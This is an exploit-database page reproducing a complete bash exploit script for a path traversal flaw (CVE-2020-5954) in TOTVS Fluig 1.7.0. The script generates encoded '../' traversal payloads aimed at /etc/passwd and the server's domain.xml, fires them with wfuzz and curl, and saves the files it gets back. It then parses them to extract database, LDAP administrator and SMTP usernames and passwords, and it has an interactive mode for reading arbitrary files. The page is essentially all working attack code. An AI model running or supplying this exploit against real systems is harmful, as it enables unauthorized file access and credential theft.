Advertisement






Fluig 1.7.0 Path Traversal

CVE Category Price Severity
CVE-2020-5954 CWE-22 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-03-05
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030024

Below is a copy:

Fluig 1.7.0 Path Traversal
# Exploit Title: Fluig 1.7.0 - Path Traversal
# Date: 26/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: https://www.totvs.com/fluig/
# Version: <== 1.7.0-210217
# Tested on: 1.7.0-201124

#!/bin/bash
url="$1"
npayload=$2
> payload.txt
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
# -- FUNCTIONS --

function create-payload {
    > wordlist.txt
    count=1
    while [[ $count -le $npayload ]]; do
                                                                        # WINDOWS PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
                                                                        # LINUX PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        count=$[$count + 1]
    done
}

function manual-mode {
    while :; do
        echo
        echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"
        echo
        echo -e "\033[0;32m   -[ clear          -     Clear Screen\033[0m"
        echo -e "\033[0;32m   -[ target         -     Set a target\033[0m"
        echo -e "\033[0;32m   -[ director/file  -     Ex: /etc/passwd\033[0m"
        echo -e "\033[0;32m   -[ info           -     Target info and parse 'domain.xml' file ( require target )\033[0m"
        echo
        echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
        path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
        mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
        if [[ $path == 'info' ]]; then
            clear
            cat banner
            domain-xml
        elif [[ $path == 'clear' ]]; then
            clear
        elif [[ $path == 'target' ]]; then
            XmlPayload=''
            echo
            echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
            echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
            enum
       else
           echo
           echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
           wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
           DirPath=$(head -1 payload.txt)
       if [[ $DirPath  == '' ]]; then
           echo
           echo -e '            \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
       else
           curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
           echo
           echo -e '\033[0;31m'$path'\033[0m'
           echo
           cat report/$mdr/$mkfile
           echo
           pwd=$(pwd)
           echo
           echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
      fi
      fi
    done
}

function domain-xml {
    domain=$(ls report/$mdr | grep domain.xml)
if [[ $domain == '' ]]; then
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
else
    echo
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
    echo
    echo -e '            \033[0;33m[!] INFORMATION\033[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '\033[0;31mTarget\033[0m'
    echo $url
    echo
    echo -e '\033[0;31mPayload plaintext\033[0m'
    echo $XmlPayload | base64 -d
    echo
    echo
    echo -e '\033[0;31mPayload base64 encoded\033[0m'
    echo $XmlPayload
    echo
    echo -e '            \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
    echo
    echo -e '            \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g' 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
    echo
    echo -e '            \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
    echo 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    echo
    echo -e '            \033[0;31m[!] SMTP SETTINGS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
    echo
    manual-mode
fi
}

function enum {
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
mkdir -p report/$mdr
    if [[ $url == '' ]]; then
        clear
        cat banner
        echo -e '   \033[0;31m-[  Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
        echo -e '   \033[0;31m-[        Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
        echo -e '   \033[0;31m-[           ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
        manual-mode
    elif [[ $npayload == '' ]]; then
        npayload=25
        clear
        cat banner
        echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
        echo
        echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
        echo
        create-payload
    else
        clear
        cat banner
        echo -e '     \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
        echo
        echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
        create-payload
    fi
echo
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
echo
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
payload=$(head -1 payload.txt)
if [[ $payload == '' ]]; then
    clear
    cat banner
    echo -e '  \033[0;32m | TOTVS FLUIG -  PATH ENUMERATION AND XML ANALISYS \033[0m'
    echo
    echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
    echo
    manual-mode
else
    param=$(echo $payload | base64 -d |  cut -d '.' -f1)
    clear
    cat banner
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
    echo
    echo -e '            \033[0;33m[!] VULNERABLE\033[0m'
    echo
    echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
    echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
    echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
    wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
    clear
    cat banner
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
    echo
    echo -e '            \033[0;33m[!] VULNERABLE\033[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '\033[0;31mTarget\033[0m'
    echo $url
    echo
    echo -e '\033[0;31mPayload plaintext\033[0m'
    echo $payload | base64 -d
    echo
    echo
    echo -e '\033[0;31mPayload base64 encoded\033[0m'
    echo $payload
    echo
fi
XmlPayload=$(head -1 payload.txt)
if [[ $XmlPayload == '' ]]; then
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
    manual-mode
else
    curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
    manual-mode
fi
}
enum

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum